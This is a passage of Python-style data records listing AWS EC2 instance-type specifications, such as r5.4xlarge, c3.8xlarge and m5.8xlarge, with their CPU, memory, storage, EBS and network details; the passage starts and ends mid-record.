[{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 320, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 320, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 18750}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 18750}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2880, 'BaselineThroughputInMBps': 360.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 18750, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.8xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 6800, 'BaselineThroughputInMBps': 850.0, 'BaselineIops': 30000, 'MaximumBandwidthInMbps': 6800, 'MaximumThroughputInMBps': 850.0, 'MaximumIops': 30000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 16, 